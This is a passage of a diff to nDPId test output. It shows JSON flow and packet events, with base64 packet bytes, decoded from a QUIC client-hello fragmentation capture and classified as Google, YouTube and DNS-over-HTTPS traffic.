pAW9DPw533VK1F2HoCn3U9TSSojbSvKUhD5pkbtLeWikk9yO3bArlheE4cXpsDpxzpKyb+b625k3E3BKOMUug6yBthPhhd+KYT9k7QNv49jm145a6LOpftpBseU6YgEk3IkEn1kE0Ry+7JgvD+e7\/hPh4fTdkqT4\/TjJBDL\/5cc4C745utJS\/GXQLmxqClZo8OaKh+kXsNsf3UBWFfLD7KYYITUazzjm4HTDJx22SBXRiSymUZaCiqENZ+uQsLGTRXM6uMxohZt8R\/IQ8G0EqRIa+L34Shdk3NM4sny6iPaT2GH9XAJHyLYemSXNtIrflbXIk7DcAe9WoEKXLafhV1Jrt2VExW1lKiX3NE7AAcMr2YnXBca+0F0\/6iDygHo5jrguhUsl0G\/7cLdUv8CGCYL3MesNJjj71hJsM+4d2agB4IWoE5R19rtfLA1vtKIDOXTGa2fzqMjyQoe+YW5HTBVmgNVSkZf8TM5SDI0XzGDjmd5nIpY2o3rBWBv9s6WzH2rmNVqIh7TJUJMAcpiwJjtgJzrS5Df5gmwZJz6ADwyaSKk2RZlhl7rdxydk46DIs+UU5sl+oKmvzr\/a0f+puDT8Pqc5OFZU4lQ5MXrn49YD
Ck9QPkWSlDYRK1UI4nr4NWKo\/\/Pw\/UFfpF9RnncBRyUFvONCCgRjmgmTi97CEEwbbxu\/Ki8qbPdIDbhcLsKaHhiFtKjKD0dMVkAfS16egEUxcfuMtmT8\/+LcTgqwwjg\/mITmoaavzef\/yGP6uX9jutL\/g3miLPjpmyK5Acy3dJwCKXrUWYFg70tEZ670oPo3w3+vZPuxYO7UtMA2cZA7eta5PXcPaU8MOYnga\/iqCsWqSwZ05kCD8++07rRI1TOxvKxLmRo5hLgAqZ\/VaeBFZ3vrlfLivk6N9hE4WT2M2RUIs7n"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1621431465588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431465588,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFOJAAH4RYRqokEAFgPgYAeyHAbsFTuuvwP8AAB0IU7\/qR9hybwkANwBhzZIZzXuLO+ITUxwPQ154KDm4YAA5umLfVFm+RmcLUYDlEBA\/pAz6nvB8AVSCdTXI5TOYsV9E\/QWBFKCDCIBHTHvFyIcz+i9HnhzJx3oomex6fz89Wv0t4v5XCsZ2gtXaLihep1Q6RHSn816q6Kh40Jb6q21pIvxBT+cRUyfL9XQqtwbCmih\/1k+KHNhNh+kRFh6XJbGZqdVuNiBplHu6zJ0pkshr1pvC1LJhyvQU0Dm4mWPTqJuQqwLB7hjY60vKpAGHvyyOczQWN09erIQDzXbzqMhL4b0M2w1\/TlT7huuQTxEID3j5k9KaYjz6kf0ER1JcH8cEnZSpU6ZDcA0aKtSUCRbfGucvzpXAlU1P0gD13ZbHqKxSYrqnpXGcTVwS3I9+c5Q\/VkUgvsZc0wf\/9MEOjlcithT92XYA7xmlU0UfwPd4Ojf1wNxPgSU\/K0DnDk1womS0G\/ZSh9D9ZlZVB5yVA13pIiaR+k8r1X82fdroTGzdHugbU8o3fbaRyQm8b4yRtnFzF0LxEo7PtOJzdm0ZBLoje+ZNNqh9NFtJ9V1qQS1X9VNOsUZvWPNgQBaeyZndWXpgl15MvPmte+qN9awZ8E\/Y3bjdMYO04PR3Tn
IuFN08oA49CYA1VctJp7\/dE8aTfiUzEHQg2lRh\/vprMm4FsAuocyWHNetPgpGS\/nW\/ajz3nUWrWpr4p5iU3XvWC1ReAGuIIwesUqSmu427nLGiB1ay7OxzNWba7FJKEY4XyQMczhEntYCEKh4B2jDrKe9HHMi65qX0Oh6pF0JJHBGwEfsMrAVsySYaPZfJk7O3QMH6jwaf2H8zG51QPhsVfJebD1eM82cCAiKz3k4AxeP1Mp2XyoYtWJntK6nrkhq29ZSo8N9IF25Bx4cyZQ1gWgsf6YOucgt1DYomgaAz5sN1VRPs3lKuTuJk+9CmvbZws8Lrl5pNQluKA7HS6J5r6Sdko6sMJa32MLYdskh\/eWjyAO4PIU0DLNnI9urDc90Tl7DeKVFUDKd5Ccw06SjbQZXaBeFclUY6Rq7ktvqS4xNkU42wPXNNkc+Km0VcpWL5mTb8raM3lJS9QkTtvIQ+D3CxIQKxNN71qsRBMGUoIaCSVO44MLEyhaXL++UAl6veMNbMWNzpyGl2ZAQaiMg3gh88e\/KjyFDhVelq57ttuwxfYY4HdAvf1O7Wm2niYjEYy3EGd+XJh75LEv2J7OvkX\/TDKMoDPHZBKylGhceTFClV6SwJCqHbmFRPRljZRudE8DcvLMdi2ArGtC7wV6BJuPxvznknqIpsuPaaUACqFh132DMk+VymlGGrHAEvcCDBXHcv+s986i6aYzFj3+UG25eWMpILHj80J8I1qvmexhdgAH0\/xq6OcVC+CWTvOrw2ojyebhvuLWQwJTRfXumFCZVnkVXMY\/wBcky+Zey4VYpd2tteRlcYmo0gstMZmuJQkyXGMQDd6DmMt+xSCBKdq2pU3+cJZWcSDy+PS90fcIm9NFtg1W76+\/3yU3UvgIkGb2htcHHuLcboGe6WFdcvOvn66fYN1q99qa+mvjvMLlrlsqtu4oszePWHk3JUyZ0uzuBriY6ZOViLOu9+ngcuDNQPDEI8BMfCUASLWFyzVNOtTnOzlD21\/UqlSPBUT+FMnLB8yDq8q7wJuDMTSdqKQ5\/2g+\/gT1sPzVcQn8bdHpPg21YclHOSozdRTvS2OQZHZHwOsQ3Q8D0cWDoLqYrm7VvgO2SJgZmoD+0O+6Mg5gIxvYEyW63O7uwaFAXSn6cSWSij"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; 
x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1621431482942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431482942,"pkt":"AAAAAAAAAAEATej1CABFAAVioMVAAH4RjguokEAFsVYuztyoAbsFTmeUz\/8AAB0IyBHAZ\/KzP6sANwD5gA3If0Iup4ZIgtnchwt9ocBVPoi0jazUzZX7baSHnp2+ZpfaMjYJtsimLMd7snuHAP5qKMdE\/QlWzMm9QjekYI5DKIp3Vs2bgEYSzsPRJHJKk+aezBC58a0+UE3a4VvidK0X7rVv7FFtJ\/MlZ0l7eyLpQagPrjcoOKGABkLRMC8f8c7JiV+3vMxbVMzswL0F0LHGpOF6tJmgxxG3+uIP4la3w9aqL9EIveC4NT3J3l\/d0v30cvaNQdKp9qrKAtUZ3b8p5FSbz95HiJcYx1aCRH8HEjdQWEZtyOX1SVZcoQkIfAis2hQqjHVzbGHJilsHstK+d\/yh1vND+cvzFLHGQ69Qa22CEae79RChQnTrK2ZCkxDnMfq1REzR81Vvo7\/ll3OtbcsHwGPv90oLgV5z+gQBcGSsn+txIgajW5\/OHfM0j4G0dOYCsFP1nOlqm4KZEyRojk5FD9gkh+QOWzUWMY5A1pCDVEbH98Ij7MdFXOII4eyOGrKjZzB3mOY4L3c23aLspNnA\/xDDGoLwBtxo8tuS0zMN0N7GirfEc+UfpigoL4GN63\/LWtTXGeRupY0hNf1HQSb5VrjXblNspzeSPkwLA3aJ5esrWE6xSGdL6JZ5WypP8xT64XLmr0Zb60RDfQA5rRVy5Slfvqsy9gpQwpIPi8FWy85za9+wqZmlViFlX2epvHU\/FjVYv3WNuP8SbX3Uhu84jX8xNIyRWWdBxFeFE\/86cZtOr\/Y3X4PqG7sr0JWY\/fMaNEX7\/wyGWZ4GThmJ5+cXL+EYkRu6GhEEZrNAi+9kCVttLBMUDHxs8XD83alhSam2NBHXrH3qgMFg4wem33ZjfiDKFbwU8lzTj0R5jphur9\/TMii0ZE4o\/tWuxXum9FphC9lsiHff\/LoE+tpkkEGSJvfUkY+42PUd+iyulKfdSSlb2w3ICSW982gZX8yqFnIWdMtFMt7VtGfDY6b2g\/VctCi7tH4bfPeCfOSltFtkJj87\/U\/kUi9e1b26oCdt5Xk6wLRo21LJgccFK7EgeSfdK8uEGdrc\/u9CQqoxHZNC0NFUmmKcp\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\/WGH4+IC4wpPGe9o5k38RrL8SgNobFDQ7d4KUVI\/R6UNBDzFLkmCpffORWC9LBKt3SKQtPDoJw4\/zzDEridhd8NKA22XDC0i6N8sevkZDtKuiWYpfGInjxye\/dACo5mlltAELaIWcGHUxsmgi"} 
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621431301735,"flow_last_seen":1621431301808,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621431301735,"flow_last_seen":1621431301808,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1621431520499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431520499,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMyFAAH4RJiSokEAFmWIcTsABAbsFToP3zf8AAB0I8UfMm0YCumkAAEU0qB108owToXTtuCRjc+70inAihifYHiWbQuXfJea7VaHoD1Z3r4\/vBhoSdhxMdibKvoSajiWd+GKpZIpSe6Mu3b02WuJTQZ7lIlxB6R8387TPpWvfdvZCcexYSs5w06Q1KSKSldCKb13732QiDhmceyuJ+G\/vOPKCn4lhROVQeWtYaKBdyapYqZHfhjZWjljHpjVo2vNz+VkBflOX+Ozm6T\/87Vc5UeUm3B37gfSZ4LeIx7NevaSMxGXLmBBGm53OH67qMQ24dCiLmx1nIEP2GSXUuuxzvdiYJ+C33xdZKaEr6jhIjm7VN1\/Zu8CjfkKQf7D8e9dFZtoH9YVFCLq08e8yFNdGIgBhWD1FTAmwmExuDbbN8chYJX2X\/1hfjPMXADpNHptZq24MTx4Ub2WVKMWLSPtjykME1uGVH48mFoWytx02J11gW\/ap3AsmyZ9NdEW7Cunzb7OdwAsLm5eBcsvVYsBASXkXW3J41zJ4fFwc7gDX94tPUT2MihCUm3spqjn8qePvRLkJUMDo\/SAAm5dZcaQtVMRqKRQyJK3obHEqKv8SvkNiEUp6IvmaXKJzaHAMKbNjzuPBN5APMlSrVhrdjOoWnxltOAScvKXxSntCksumIK1eZRzMyHmhY2Zkz\/cbLMG+nbi739ExhDy7kfNZcN1w7DL8T3NA2lau5y0gmwx2J+etKbkof1MTLgLIWQjaMgJ3Yg5iRbSia+X7UmijUvf0oRg1VUpzVMKvybapDiUxy7TKrPFHlmnAdWt7EbvCGo4ZOvDt9jNsJ3ry3qsfnRRTY0KCXoq9KBhKDVmNwRT0CfKMZF9UZyQR8waEK3M2khCNE8K0HtopU
IBaei2pkSAkP0cWMAQzYQoAL9RPKGIb2zxA2FTLXUCeYjqOz5YFjo\/YUbPspSIkamI5Uqoz3HxLcyaZT1IlDi3snj703Pl1raa5uPYB9SbeFS3jz22i+jMB1jK64ocdk\/Ap04WGAZSylA0JvWsYxDreLK4icj5p\/lle+733epQE+WSvjvH3tpEFuFmbvfaXn1HUnxAw3Znts4em7rmRTGyYtwIh8Xo3qzYWxNp\/\/277cZjRt9QzcMt6pSHqe\/yM04MKoyEXtKFSOMDWukBJqjkH4ISeeqHmQ0D2O3e10r1RYA0qfHiQCpBrjUzeDJ5xQe6BIM9EKqojRuTs\/9mFZHxEdvsWM0nr40pxU4fyO6RlV7bvX6gjlu6xDeyImfTBJ1CrhxkM0NIOLgBByqIu1vkvl+ToqkPCKb8lpAmBCSOuL8LVtqnQvcqcllj+MkGi4em4vqlh9wF35mSy9bZRKUfyGp+cvVqboEHj5rnD\/784KqHiRDHIGgaFgNoSsGakObjU1Rp9zwOiAfj+k7Rb9uzcZoWDO5B2gL8j4OXSBSVhkAirs3N86IOumv\/3IoeWBTvvkpNELfLJuEh70vkySKCdBxM0hwVEaMSCru3BXwqtfPMH1QJ4jHNqxDAuEHki1cwAcJhlCh9Wp3ET7xqPW7AeUxwE9fN3Jod8qufi8Ujiy3wnc8\/qOYbxiPpALR0F1dCk1cwWv9kpGmhEZ6eBwn6kYxBWDq0P1zZ7tjZHsfRLSAnN8M937kF16B4WONO3kFuMiJaE8dalwqulOnHsnWLkMT4dr795Qeky6SKp5+YFHGV+5ALzCSXCENO4JxTGck3fzNG3n\/Cx2j6bb0QI1wP3YfxO0Zb0Z81wO59qyyo3YabxIs6ynT60zY7ne50FIpDZulJ5HZlhqxpkr0W\/k06atJOkV0Ej"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
